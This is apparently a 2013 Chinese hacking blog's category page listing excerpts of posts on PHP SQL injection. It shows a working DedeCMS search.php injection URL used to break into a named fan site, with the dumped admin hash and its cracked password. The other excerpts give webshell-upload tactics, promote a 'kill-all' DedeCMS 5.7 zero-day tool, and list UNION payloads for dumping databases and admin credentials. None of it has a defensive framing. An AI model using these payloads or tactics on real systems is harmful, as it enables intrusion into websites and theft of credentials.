当前目录: php注入
渗透王力宏中文网织梦漏洞

2013年8月14日  php注入,网络安全   

那么直接用下面的exp [code]xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a[/code] admin 04d1823eacbfc41d78f9... 忘记了,这是20位数的 我们去掉前面一个,去掉后面三个 错了,是去掉前面三个,后面一个 1823eacbfc41d78f = lezhe888

网站渗透的一些经验

2013年8月13日  php注入,网络安全   

1.无论什么站,无论什么语言,我要渗透,第一件事就是扫目录,最好一下扫出个上传点,直接上传shell,诸位不要笑,有时候你花很久搞一个站,最后发现有个现成的上传点,而且很容易猜到,不过这种情况发生在asp居多! 2.asp(aspx)+MSSQL先考虑注入,一般的注入都有DBowner权限可以直接写shell;如果写不了,或者web与数据库分离,那就猜数据,从后台下手了,后台可以上传或者改配置文件; 3.asp(aspx)+ACCESS拿shell一般只有3种方法,一是前台上传或者注入进后台上传;二是注入进后台改配置文件;三是注入进后台备份数据库或者暴库后知道是asp或者asa数据库于是直接写一句话; 4.php+MYSQL一般是注入进后台上传,偶尔运气好些权限够高可以注入select into outfile;然后包含,分本地与远程,远程包含在高版本php是...

织梦最新漏洞5.7及利用工具鬼哥dede5.7_0day

2013年7月31日  php注入,网络安全   

织梦开源CMS系统功能强大的同时也存在多处漏洞,这里最近就爆出了最新漏洞5.7版本的可以通杀,这里放出了利用工具看图直接就可以使用。 鬼哥dede5.7_0day.rar

php手工注入基础知识

2013年5月21日  php注入,网络安全   

order by [code]and 1=2 union select 1,user(),database() 查选当前用户名 库名 union select 1,group_concat(schema_name),3,4 from information_schema.schemata-- //当前所有库名[/code]   [code]union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()-- 当前库的所有表名[/code]   [code]union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=库的HEX-- 查表名[/code]   [code]union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name=表名-- 查字段[/code]   [code]union select 1,concat_ws(0x3a,name,password),3,4 from admin--[/code] &nbs...

第2页,共2页 首页 上一页12下一页 尾页